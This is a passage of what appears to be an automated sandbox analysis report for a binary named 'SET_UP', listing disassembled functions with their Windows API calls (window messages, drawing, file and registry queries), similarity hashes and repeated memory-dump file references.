                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Menu$Delete$Path$ExistsFileMakeMessagePrettyResumeSendSystemThread
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2590489476-0
                                                                                                                                                                                                  • Opcode ID: 879a105cec56165ca79214af896d245a003f67b06647fd70dd72bf31cb2f6334
                                                                                                                                                                                                  • Instruction ID: dac6016bbcae5ac864d71d9366641cc86e34084f98c5d0085b01a170d4bfcc75
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 879a105cec56165ca79214af896d245a003f67b06647fd70dd72bf31cb2f6334
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F431B430600601AFCB20AB66CD49E9BBBF9EF84704F10447EF14AA72A1DB759945CB68
                                                                                                                                                                                                  Function 00414B78 Relevance: 12.1, APIs: 8, Instructions: 89windowtimeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00414B8C
                                                                                                                                                                                                  • GetCapture.USER32 ref: 00414BC4
                                                                                                                                                                                                  • SetCapture.USER32(?,00000000), ref: 00414BDB
                                                                                                                                                                                                  • PostMessageW.USER32(?,00000115,00000003,?), ref: 00414C08
                                                                                                                                                                                                  • PostMessageW.USER32(?,00000115,00000002,?), ref: 00414C1F
                                                                                                                                                                                                  • PostMessageW.USER32(?,00000115,00000001,?), ref: 00414C36
                                                                                                                                                                                                  • PostMessageW.USER32(?,00000115,00000000,?), ref: 00414C4C
                                                                                                                                                                                                  • SetTimer.USER32(?,00000001,000000C8,00000000), ref: 00414C65
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessagePost$Capture$ParentTimer
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1786324385-0
                                                                                                                                                                                                  • Opcode ID: 19f8ddfacc75d5605a355e8c7328b13cefebe2f5a41d319e653d9cf151247c31
                                                                                                                                                                                                  • Instruction ID: d9c92ef1d233b1973696056cd25800c528584823eebb1f6194e0154ad6fb0c0f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19f8ddfacc75d5605a355e8c7328b13cefebe2f5a41d319e653d9cf151247c31
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D31A571311B04FFEB315F61DC09FDA7B75EB44704F50882AF702952A0D77998919B68
                                                                                                                                                                                                  Function 00481910 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 65stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                  • String ID: (:D$A$C$Can't write sCAL (buffer too small)$L$s
                                                                                                                                                                                                  • API String ID: 1659193697-41905255
                                                                                                                                                                                                  • Opcode ID: ce75f71c5be14d8d6f581b1601b49c4aaa4f927c7415f820c48da183aced58f9
                                                                                                                                                                                                  • Instruction ID: 3a4876cceb81d0ed29f83344d7e844f1c21219816d4e69b61a6989ccc5da8a10
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce75f71c5be14d8d6f581b1601b49c4aaa4f927c7415f820c48da183aced58f9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8211E97260C3484FC705EB68A8419AFFBD9EFD5214F44085EF98557341D6AAAA0CC3B3
                                                                                                                                                                                                  Function 0040997C Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 330COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • InflateRect.USER32(?,000000FB,000000FB), ref: 004099F3
                                                                                                                                                                                                    • Part of subcall function 004C0464: SetBkColor.GDI32(A5A5D47D,?), ref: 004C046E
                                                                                                                                                                                                    • Part of subcall function 004C0464: ExtTextOutW.GDI32(A5A5D47D,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004C0484
                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000000,?,?,?,00000000,?,?,?), ref: 00409AB6
                                                                                                                                                                                                    • Part of subcall function 0041A69B: __ftol.LIBCMT ref: 0041A719
                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000000,?,?,?,00000000,?,00000000,?,?,?), ref: 00409BC5
                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00409C3C
                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000000,00000000,?,?,00000000), ref: 00409C95
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DrawImageList_$ColorInflateRectText__ftol
                                                                                                                                                                                                  • String ID: audio
                                                                                                                                                                                                  • API String ID: 1229794287-410859157
                                                                                                                                                                                                  • Opcode ID: 5056b181c1c96504bbe3fe1884ae486a0d9eb0e3f0563b50a9667ecb7f691575
                                                                                                                                                                                                  • Instruction ID: bbe5c1424f7f6be040fa121057891488958217719064435e28c3a0437eb8e737
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5056b181c1c96504bbe3fe1884ae486a0d9eb0e3f0563b50a9667ecb7f691575
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FC19B32A00109EFDF05DF68C889AEEB7B6FF49310F04802AF915AB291D775AD45CB94
                                                                                                                                                                                                  Function 004A875D Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 241fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000001,80000000,?,0000000C,00000001,00000080,00000000,00000001,00000000,00000000), ref: 004A8910
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004A891C
                                                                                                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 004A8931
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004A893C
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastType
                                                                                                                                                                                                  • String ID: @$H
                                                                                                                                                                                                  • API String ID: 1809617866-104103126
                                                                                                                                                                                                  • Opcode ID: bd4b47cba76a7a305c3128ebad9f95517d9cbc88c7c2af01c67b16adb4f56ce7
                                                                                                                                                                                                  • Instruction ID: 8f1da54f663758aef70ce60561b7db3f7c220e6258dced4633ab35b5840e3427
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd4b47cba76a7a305c3128ebad9f95517d9cbc88c7c2af01c67b16adb4f56ce7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B18128718042499AEF246B588C447BF7B64EF33368F64462FE8116B2D1CF7C8945C75A
                                                                                                                                                                                                  Function 0040C866 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 155windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040C86B
                                                                                                                                                                                                    • Part of subcall function 0041F066: GetModuleFileNameW.KERNEL32(?,00000000,000003FF), ref: 0041F0A2
                                                                                                                                                                                                    • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040C8CC
                                                                                                                                                                                                    • Part of subcall function 004B01E6: SendMessageW.USER32(?,0000104B,00000000,?), ref: 004B021A
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040CA13
                                                                                                                                                                                                    • Part of subcall function 0041C59D: __EH_prolog.LIBCMT ref: 0041C5A2
                                                                                                                                                                                                    • Part of subcall function 004C4DCE: __EH_prolog.LIBCMT ref: 004C4DD3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prologMessageSend$DecrementFileInterlockedModuleName
                                                                                                                                                                                                  • String ID: %s\%s$Backup$Data\File Types
                                                                                                                                                                                                  • API String ID: 4127239310-493203647
                                                                                                                                                                                                  • Opcode ID: 56127fed28ebc13f22c371980317d7c6610c64c4bb2ba93f70920b724f7331f0
                                                                                                                                                                                                  • Instruction ID: 1ac92478ccd4a68978141e2f220d119aa82b309995c4a9bf0ebb16eeaf250436
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56127fed28ebc13f22c371980317d7c6610c64c4bb2ba93f70920b724f7331f0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0519F71A00249EFCF14EBA5C985AEEBBB5EF18314F10456EF511A32A2CB385E04DB65
                                                                                                                                                                                                  Function 004151F8 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0041520A
                                                                                                                                                                                                  • SetRect.USER32(?,?,00000000,?,00000000), ref: 00415227
                                                                                                                                                                                                  • SetRect.USER32(?,?,00000000,?,00000000), ref: 00415238
                                                                                                                                                                                                  • SetRect.USER32(?,?,00000000,?,00000000), ref: 00415249
                                                                                                                                                                                                  • SetRect.USER32(?,?,00000000,?,00000000), ref: 0041525A
                                                                                                                                                                                                  • __ftol.LIBCMT ref: 0041530E
                                                                                                                                                                                                  • __ftol.LIBCMT ref: 0041532D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Rect$__ftol$Client
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1348164131-0
                                                                                                                                                                                                  • Opcode ID: 6ad16158a7037672bee329fe86346c9e08b022bcd8ad4d3b62a051858a39d2b5
                                                                                                                                                                                                  • Instruction ID: ec047a174ae6a4628e80e23085a6ee7d5093783324aeece9a468a82e60cf12d6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ad16158a7037672bee329fe86346c9e08b022bcd8ad4d3b62a051858a39d2b5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E51FB71A00B08EFCB64CFB9C984BDAB7F6FB84344F51892ED4AA93210DB706944CB55
                                                                                                                                                                                                  Function 004143CC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004143D1
                                                                                                                                                                                                    • Part of subcall function 004B9853: __EH_prolog.LIBCMT ref: 004B9858
                                                                                                                                                                                                    • Part of subcall function 004B9853: GetDC.USER32(?), ref: 004B9881
                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00414403
                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0041444C
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,?,?,?), ref: 00414538
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CompatibleCreateH_prolog$BitmapImageList_Masked
                                                                                                                                                                                                  • String ID: <L$VGL
                                                                                                                                                                                                  • API String ID: 3237123024-514139165
                                                                                                                                                                                                  • Opcode ID: bb89efb10ffc2b258e50ca399788dbf67c979eca88fd85f5f9a74f0785389662
                                                                                                                                                                                                  • Instruction ID: 39846ed70d51f3bdd042e514158308d3c28c620d7d4503cc53b083f5d4ca0e6c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb89efb10ffc2b258e50ca399788dbf67c979eca88fd85f5f9a74f0785389662
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA515C71D00119AFDF05DFE8C996AEEBBB4EF05304F10416AF501A7281DB78AE45CB64
                                                                                                                                                                                                  Function 00414584 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00414589
                                                                                                                                                                                                    • Part of subcall function 004B9853: __EH_prolog.LIBCMT ref: 004B9858
                                                                                                                                                                                                    • Part of subcall function 004B9853: GetDC.USER32(?), ref: 004B9881
                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 004145BB
                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00414604
                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,?,?,?), ref: 004146F0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CompatibleCreateH_prolog$BitmapImageList_Masked
                                                                                                                                                                                                  • String ID: <L$VGL
                                                                                                                                                                                                  • API String ID: 3237123024-514139165
                                                                                                                                                                                                  • Opcode ID: 09e61968e60e0303f8956f879f2adb7231567397d1f8228ec8e824efa3b4ac6c
                                                                                                                                                                                                  • Instruction ID: ef56c3fe8e1687ceb0cc115731e1c8fb5f00a03b187b6d3c4346f85c6aaa52ee
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09e61968e60e0303f8956f879f2adb7231567397d1f8228ec8e824efa3b4ac6c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75515C71D00109AFDF05DFE8C996AEEBBB8EF09304F10416AF501A7291DB789E45CB68
                                                                                                                                                                                                  Function 004B4FC1 Relevance: 10.6, APIs: 7, Instructions: 122windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 004B4FF5
                                                                                                                                                                                                  • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004B501E
                                                                                                                                                                                                  • UpdateWindow.USER32(?), ref: 004B503A
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000121,00000000,?), ref: 004B5060
                                                                                                                                                                                                  • SendMessageW.USER32(?,0000036A,00000000,00000001), ref: 004B507F
                                                                                                                                                                                                  • UpdateWindow.USER32(?), ref: 004B50C2
                                                                                                                                                                                                  • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004B50F5
                                                                                                                                                                                                    • Part of subcall function 004B5633: GetWindowLongW.USER32(?,000000F0), ref: 004B563F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2853195852-0
                                                                                                                                                                                                  • Opcode ID: 7711a24d4835398a3bca63de38c0f91caf1af2a0a1bc739449a73e7966803685
                                                                                                                                                                                                  • Instruction ID: 6a62d8544b48f859d64db04fc3108f2d0370039e73a2eabbb58f4763c31b7b97
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7711a24d4835398a3bca63de38c0f91caf1af2a0a1bc739449a73e7966803685
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D417130604B419FD730AF26C844FABFAE4EFD1B05F140A2EF48196291C779D905CBAA
                                                                                                                                                                                                  Function 004C5B89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004C5B8E
                                                                                                                                                                                                  • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 004C5C3E
                                                                                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 004C5C58
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004C5C74
                                                                                                                                                                                                  • RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 004C5C89
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
